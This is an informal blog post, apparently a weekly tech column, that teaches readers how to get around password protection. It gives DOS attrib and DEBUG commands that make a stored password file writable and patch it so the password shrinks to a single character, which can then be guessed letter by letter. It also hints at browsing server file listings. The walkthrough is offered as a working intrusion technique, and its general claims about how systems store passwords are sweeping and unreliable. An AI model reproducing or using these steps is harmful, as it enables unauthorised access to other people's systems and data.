Weekly technical blah - This week- Password acquisition

Ok, im going to sorta skirt really close to some legalities and morally questionable areas here, so if youre an upright citizen who is not curious about things then ignore this. Today Im going to give you enough info to get started on the most basic of encryption hacks-password acquisition. Again, if youre upright..well..WTF are you doing here anyway? Otherwise, I'll need to explain a few things before going on: -all systems-hardware and software, which use passwords, need to store them somewhere in order to recognize them later. They will use this file to check against your entries when you enter a password in any given instance. You'd be surprised how often its actually labeled "password.whatever.." -this file WILL be stored locally. (local to the system, whatever type it is) -This file, or at least the password..but generally the whole file..will be encrypted. Often you can locate it by the very FACT it IS encrypted when other files at that point are startup ones and otherwise obvious standards. -This encryption will generally be someting you cannot read looking at it. You wont be able to substitute letters for numbers or anything that simple. However, here's a general technique that you can play with in getting started: look for something (again stored locally as BLAH.PSW as a 10 character string, or PASS.blah etc. Make a backup copy first then remove the archive and read-only attributes to gain write access to the file:


copy whatever.psw password.bak
attrib whatever.psw -a -r (NOTE: again, if you know you'll know, and I know im making this hard but Google is your friend AND ITS NOT THAT HARD to see what im referring to--youll need to know it anyway if youre going into this sphere)


Now you can edit the password file using debug (if its a dos-level) or editor, etc with others, this example will go with Dos-level type:


debug blah.psw
-d
OC4B:0100 85 8C 89 9A 8F 83 E9 E9-E9 E9 xx xx xx xx xx xx


The first six bytes in this example are the encrypted password followed by padding (encrypted spaces) and the terminator. Use debug to change all but the first byte to match the padding. For example:


-e101 E9 E9 E9 E9 E9
-d100
OC4B:0100 85 E9 E9 E9 E9 E9 E9 E9-E9 E9 xx xx xx xx xx xx


Now write the edited file back to disk and quit debug:


-w
Writing 00012 bytes
-quit


Start the dos-level or whatever program and try each letter of the alphabet in turn. It will throw you out after 3 invalid entries so simply reload it and continue. In the worst case you will need to reload 8 times. As soon as you discover the new improved single character password you're in.


Whee.
learning.
Note_ if trying on server files or site, often its as easy to locate the file or files as using the site name and adding a "/" (without the quotes) to the end or index. etc (again, simply google 'server file list' etc..youll have to do SOME of the work)